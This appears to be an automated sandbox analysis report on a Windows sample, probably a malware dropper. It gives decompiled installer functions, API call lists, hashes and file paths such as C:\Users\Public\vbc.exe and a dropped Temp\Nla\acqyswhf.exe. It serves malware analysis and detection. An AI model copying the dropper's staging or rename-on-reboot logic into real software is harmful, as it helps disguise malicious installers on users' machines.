                                                                                                                                                                                                              0x00403b28
                                                                                                                                                                                                              0x00403b30
                                                                                                                                                                                                              0x00403b36
                                                                                                                                                                                                              0x00403b5e
                                                                                                                                                                                                              0x00403b66
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403b48
                                                                                                                                                                                                              0x00403b49
                                                                                                                                                                                                              0x00403b52
                                                                                                                                                                                                              0x00403b58
                                                                                                                                                                                                              0x00403b59
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403b59
                                                                                                                                                                                                              0x00403b54
                                                                                                                                                                                                              0x00403b56
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403b56
                                                                                                                                                                                                              0x00403b36

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                                                                                                                                                                • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00000000), ref: 00403AB6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p), ref: 00403B49
                                                                                                                                                                                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92
                                                                                                                                                                                                                • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                                                                                                                                                                                                              • RegisterClassA.USER32(00423EE0), ref: 00403BCF
                                                                                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
                                                                                                                                                                                                              • CreateWindowExA.USER32 ref: 00403C1C
                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403C52
                                                                                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423EE0), ref: 00403C7E
                                                                                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00423EE0), ref: 00403C8B
                                                                                                                                                                                                              • RegisterClassA.USER32(00423EE0), ref: 00403C94
                                                                                                                                                                                                              • DialogBoxParamA.USER32 ref: 00403CB3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$>B
                                                                                                                                                                                                              • API String ID: 1975747703-107226813
                                                                                                                                                                                                              • Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                                                                                                                                                                              • Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                                              			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                                              				struct HWND__* _t52;
                                                                                                                                                                                                              				long _t86;
                                                                                                                                                                                                              				int _t98;
                                                                                                                                                                                                              				struct HWND__* _t99;
                                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                                              				intOrPtr _t107;
                                                                                                                                                                                                              				intOrPtr _t109;
                                                                                                                                                                                                              				int _t110;
                                                                                                                                                                                                              				signed int* _t112;
                                                                                                                                                                                                              				signed int _t113;
                                                                                                                                                                                                              				char* _t114;
                                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                                                                              					if(_a8 != 0x111) {
                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                              						if(_a8 != 0x4e) {
                                                                                                                                                                                                              							if(_a8 == 0x40b) {
                                                                                                                                                                                                              								 *0x41fd1c =  *0x41fd1c + 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                              							_t110 = _a16;
                                                                                                                                                                                                              							L26:
                                                                                                                                                                                                              							return E00404313(_a8, _a12, _t110);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                                              						_t110 = _a16;
                                                                                                                                                                                                              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                                                                                                              							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                                                                                                              							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                                                                                                              							_v12 = _t100;
                                                                                                                                                                                                              							_v16 = _t109;
                                                                                                                                                                                                              							_v8 = 0x4236e0;
                                                                                                                                                                                                              							if(_t100 - _t109 < 0x800) {
                                                                                                                                                                                                              								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                                                                                                              								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                                                                                              								_push(1);
                                                                                                                                                                                                              								_t40 =  &_v8; // 0x4236e0
                                                                                                                                                                                                              								E004046BB(_a4,  *_t40);
                                                                                                                                                                                                              								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                                                                                                              								_t110 = _a16;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                                                                                                              							goto L26;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                                                                                                              								SendMessageA( *0x424748, 0x111, 1, 0);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                                                                                                              								SendMessageA( *0x424748, 0x10, 0, 0);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_a12 >> 0x10 != 0 ||  *0x41fd1c != 0) {
                                                                                                                                                                                                              						goto L25;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t112 =  *0x420528 + 0x14;
                                                                                                                                                                                                              						if(( *_t112 & 0x00000020) == 0) {
                                                                                                                                                                                                              							goto L25;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                                                                                              						E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                                                                                              						E00404697();
                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t98 = _a16;
                                                                                                                                                                                                              				_t113 =  *(_t98 + 0x30);
                                                                                                                                                                                                              				if(_t113 < 0) {
                                                                                                                                                                                                              					_t107 =  *0x423f1c; // 0x2d134b
                                                                                                                                                                                                              					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                                                                                                              				_t114 = _t113 +  *0x424798;
                                                                                                                                                                                                              				_push(0x22);
                                                                                                                                                                                                              				_a16 =  *_t114;
                                                                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                              				_t115 = _t114 + 1;
                                                                                                                                                                                                              				_v16 = _t115;
                                                                                                                                                                                                              				_v8 = E004043E2;
                                                                                                                                                                                                              				E004042AC(_a4);
                                                                                                                                                                                                              				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                                                                                                              				_push(0x23);
                                                                                                                                                                                                              				E004042AC(_a4);
                                                                                                                                                                                                              				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                                                                                              				E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                                                                                                              				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                                              				E004042E1(_t99);
                                                                                                                                                                                                              				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                                                                                                              				_t86 =  *( *0x424754 + 0x68);
                                                                                                                                                                                                              				if(_t86 < 0) {
                                                                                                                                                                                                              					_t86 = GetSysColor( ~_t86);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                                                                                                              				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                                                                                                              				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                                                                                                              				 *0x41fd1c = 0;
                                                                                                                                                                                                              				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                                                                                                                              				 *0x41fd1c = 0;
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}


















                                                                                                                                                                                                              0x00404427
                                                                                                                                                                                                              0x0040454c
                                                                                                                                                                                                              0x004045a8
                                                                                                                                                                                                              0x004045ac
                                                                                                                                                                                                              0x00404679
                                                                                                                                                                                                              0x0040467b
                                                                                                                                                                                                              0x0040467b
                                                                                                                                                                                                              0x00404681
                                                                                                                                                                                                              0x00404681
                                                                                                                                                                                                              0x00404684
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040468b
                                                                                                                                                                                                              0x004045ba
                                                                                                                                                                                                              0x004045bc
                                                                                                                                                                                                              0x004045c6
                                                                                                                                                                                                              0x004045d1
                                                                                                                                                                                                              0x004045d4
                                                                                                                                                                                                              0x004045d7
                                                                                                                                                                                                              0x004045e2
                                                                                                                                                                                                              0x004045e5
                                                                                                                                                                                                              0x004045ec
                                                                                                                                                                                                              0x004045fa
                                                                                                                                                                                                              0x00404612
                                                                                                                                                                                                              0x00404614
                                                                                                                                                                                                              0x00404616
                                                                                                                                                                                                              0x0040461c
                                                                                                                                                                                                              0x0040462b
                                                                                                                                                                                                              0x0040462d
                                                                                                                                                                                                              0x0040462d
                                                                                                                                                                                                              0x004045ec
                                                                                                                                                                                                              0x00404637
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404642
                                                                                                                                                                                                              0x00404646
                                                                                                                                                                                                              0x00404657
                                                                                                                                                                                                              0x00404657
                                                                                                                                                                                                              0x0040465d
                                                                                                                                                                                                              0x0040466b
                                                                                                                                                                                                              0x0040466b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040466f
                                                                                                                                                                                                              0x00404637
                                                                                                                                                                                                              0x00404557
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040456b
                                                                                                                                                                                                              0x00404571
                                                                                                                                                                                                              0x00404577
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040459c
                                                                                                                                                                                                              0x0040459e
                                                                                                                                                                                                              0x004045a3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004045a3
                                                                                                                                                                                                              0x00404557
                                                                                                                                                                                                              0x0040442d
                                                                                                                                                                                                              0x00404430
                                                                                                                                                                                                              0x00404435
                                                                                                                                                                                                              0x00404437
                                                                                                                                                                                                              0x00404446
                                                                                                                                                                                                              0x00404446
                                                                                                                                                                                                              0x0040444d
                                                                                                                                                                                                              0x00404450
                                                                                                                                                                                                              0x00404452
                                                                                                                                                                                                              0x00404457
                                                                                                                                                                                                              0x00404460
                                                                                                                                                                                                              0x00404466
                                                                                                                                                                                                              0x00404472
                                                                                                                                                                                                              0x00404475
                                                                                                                                                                                                              0x0040447e
                                                                                                                                                                                                              0x00404483
                                                                                                                                                                                                              0x00404486
                                                                                                                                                                                                              0x0040448b
                                                                                                                                                                                                              0x004044a2
                                                                                                                                                                                                              0x004044a9
                                                                                                                                                                                                              0x004044bc
                                                                                                                                                                                                              0x004044bf
                                                                                                                                                                                                              0x004044d4
                                                                                                                                                                                                              0x004044db
                                                                                                                                                                                                              0x004044e0
                                                                                                                                                                                                              0x004044e5
                                                                                                                                                                                                              0x004044e5
                                                                                                                                                                                                              0x004044f4
                                                                                                                                                                                                              0x00404503
                                                                                                                                                                                                              0x00404515
                                                                                                                                                                                                              0x0040451a
                                                                                                                                                                                                              0x0040452a
                                                                                                                                                                                                              0x0040452c
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                              • String ID: N$6B
                                                                                                                                                                                                              • API String ID: 3103080414-649610290
                                                                                                                                                                                                              • Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                                                                                                                                                                              • Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405E97(void* __ecx) {
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				long _t12;
                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                              				char* _t31;
                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                              				long _t42;
                                                                                                                                                                                                              				CHAR* _t44;
                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t38 = __ecx;
                                                                                                                                                                                                              				_t44 =  *(_t52 + 0x14);
                                                                                                                                                                                                              				 *0x422ae0 = 0x4c554e;
                                                                                                                                                                                                              				if(_t44 == 0) {
                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                              					_t2 = _t52 + 0x1c; // 0x422ee0
                                                                                                                                                                                                              					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
                                                                                                                                                                                                              					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                                              						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
                                                                                                                                                                                                              						_t53 = _t52 + 0x10;
                                                                                                                                                                                                              						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
                                                                                                                                                                                                              						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
                                                                                                                                                                                                              						_t48 = _t12;
                                                                                                                                                                                                              						 *(_t53 + 0x18) = _t48;
                                                                                                                                                                                                              						if(_t48 != 0xffffffff) {
                                                                                                                                                                                                              							_t42 = GetFileSize(_t48, 0);
                                                                                                                                                                                                              							_t6 = _t37 + 0xa; // 0xa
                                                                                                                                                                                                              							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                                                                                                              							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
                                                                                                                                                                                                              								L18:
                                                                                                                                                                                                              								return CloseHandle(_t48);
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                                                                                                              									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
                                                                                                                                                                                                              									if(_t49 == 0) {
                                                                                                                                                                                                              										_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                                              										L16:
                                                                                                                                                                                                              										_t24 = _t42;
                                                                                                                                                                                                              										L17:
                                                                                                                                                                                                              										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
                                                                                                                                                                                                              										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                                                                                                              										E00405E68(_t48, _t46, _t42 + _t37);
                                                                                                                                                                                                              										GlobalFree(_t46);
                                                                                                                                                                                                              										goto L18;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t39 = _t46 + _t42;
                                                                                                                                                                                                              									_t31 = _t39 + _t37;
                                                                                                                                                                                                              									while(_t39 > _t49) {
                                                                                                                                                                                                              										 *_t31 =  *_t39;
                                                                                                                                                                                                              										_t31 = _t31 - 1;
                                                                                                                                                                                                              										_t39 = _t39 - 1;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t24 = _t49 - _t46 + 1;
                                                                                                                                                                                                              									_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                                                                                                              								_t42 = _t42 + 0xa;
                                                                                                                                                                                                              								goto L16;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					CloseHandle(E00405DC1(_t44, 0, 1));
                                                                                                                                                                                                              					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
                                                                                                                                                                                                              					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t12;
                                                                                                                                                                                                              			}



















                                                                                                                                                                                                              0x00405e97
                                                                                                                                                                                                              0x00405ea0
                                                                                                                                                                                                              0x00405ea7
                                                                                                                                                                                                              0x00405ebb
                                                                                                                                                                                                              0x00405ee3
                                                                                                                                                                                                              0x00405eea
                                                                                                                                                                                                              0x00405eee
                                                                                                                                                                                                              0x00405ef2
                                                                                                                                                                                                              0x00405f12
                                                                                                                                                                                                              0x00405f19
                                                                                                                                                                                                              0x00405f23
                                                                                                                                                                                                              0x00405f30
                                                                                                                                                                                                              0x00405f35
                                                                                                                                                                                                              0x00405f3a
                                                                                                                                                                                                              0x00405f3e
                                                                                                                                                                                                              0x00405f4d
                                                                                                                                                                                                              0x00405f4f
                                                                                                                                                                                                              0x00405f5c
                                                                                                                                                                                                              0x00405f60
                                                                                                                                                                                                              0x00405ffb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405f76
                                                                                                                                                                                                              0x00405f83
                                                                                                                                                                                                              0x00405fa7
                                                                                                                                                                                                              0x00405fab
                                                                                                                                                                                                              0x00405fca
                                                                                                                                                                                                              0x00405fce
                                                                                                                                                                                                              0x00405fce
                                                                                                                                                                                                              0x00405fd0
                                                                                                                                                                                                              0x00405fd9
                                                                                                                                                                                                              0x00405fe4
                                                                                                                                                                                                              0x00405fef
                                                                                                                                                                                                              0x00405ff5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405ff5
                                                                                                                                                                                                              0x00405fad
                                                                                                                                                                                                              0x00405fb0
                                                                                                                                                                                                              0x00405fbb
                                                                                                                                                                                                              0x00405fb7
                                                                                                                                                                                                              0x00405fb9
                                                                                                                                                                                                              0x00405fba
                                                                                                                                                                                                              0x00405fba
                                                                                                                                                                                                              0x00405fc2
                                                                                                                                                                                                              0x00405fc4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405fc4
                                                                                                                                                                                                              0x00405f8e
                                                                                                                                                                                                              0x00405f94
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405f94
                                                                                                                                                                                                              0x00405f60
                                                                                                                                                                                                              0x00405f3e
                                                                                                                                                                                                              0x00405ebd
                                                                                                                                                                                                              0x00405ec8
                                                                                                                                                                                                              0x00405ed1
                                                                                                                                                                                                              0x00405ed5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405ed5
                                                                                                                                                                                                              0x00406006

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405EC8
                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405ED1
                                                                                                                                                                                                                • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                                                                                                                                                                                • Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 00405EEE
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00405F0C
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405FF5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405FFC
                                                                                                                                                                                                                • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
                                                                                                                                                                                                                • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                              • String ID: %s=%s$[Rename]$*B$.B$.B
                                                                                                                                                                                                              • API String ID: 2171350718-3836630945
                                                                                                                                                                                                              • Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                                                                                                                                                                              • Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                                                                                              				struct tagLOGBRUSH _v16;
                                                                                                                                                                                                              				struct tagRECT _v32;
                                                                                                                                                                                                              				struct tagPAINTSTRUCT _v96;
                                                                                                                                                                                                              				struct HDC__* _t70;
                                                                                                                                                                                                              				struct HBRUSH__* _t87;
                                                                                                                                                                                                              				struct HFONT__* _t94;
                                                                                                                                                                                                              				long _t102;
                                                                                                                                                                                                              				signed int _t126;
                                                                                                                                                                                                              				struct HDC__* _t128;
                                                                                                                                                                                                              				intOrPtr _t130;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				if(_a8 == 0xf) {
                                                                                                                                                                                                              					_t130 =  *0x424754;
                                                                                                                                                                                                              					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                                                                                              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                                                                                              					_a8 = _t70;
                                                                                                                                                                                                              					GetClientRect(_a4,  &_v32);
                                                                                                                                                                                                              					_t126 = _v32.bottom;
                                                                                                                                                                                                              					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                                                                                              					while(_v32.top < _t126) {
                                                                                                                                                                                                              						_a12 = _t126 - _v32.top;
                                                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                                                              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                                                                                              						_t87 = CreateBrushIndirect( &_v16);
